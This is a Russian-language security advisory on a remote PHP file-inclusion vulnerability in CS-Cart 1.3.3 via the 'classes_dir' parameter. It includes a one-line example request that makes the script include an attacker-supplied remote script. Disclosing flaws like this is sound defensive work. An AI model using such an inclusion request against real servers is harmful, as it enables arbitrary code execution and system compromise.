PHP-инклюдинг в CS-Cart

Дата публикации:
10.06.2006
Дата изменения:
05.09.2008
Всего просмотров:
3576
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
CS-Cart 1.x
Уязвимые версии: CS-Cart 1.3.3 (trial), возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "classes_dir" в сценарии /classes/phpmailer/class.cs_phpmailer.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://victim/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]

URL производителя: www.cs-cart.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: CS-Cart 1.3.3 (classes_dir) <= Remote File Include Vulnerability

или введите имя

CAPTCHA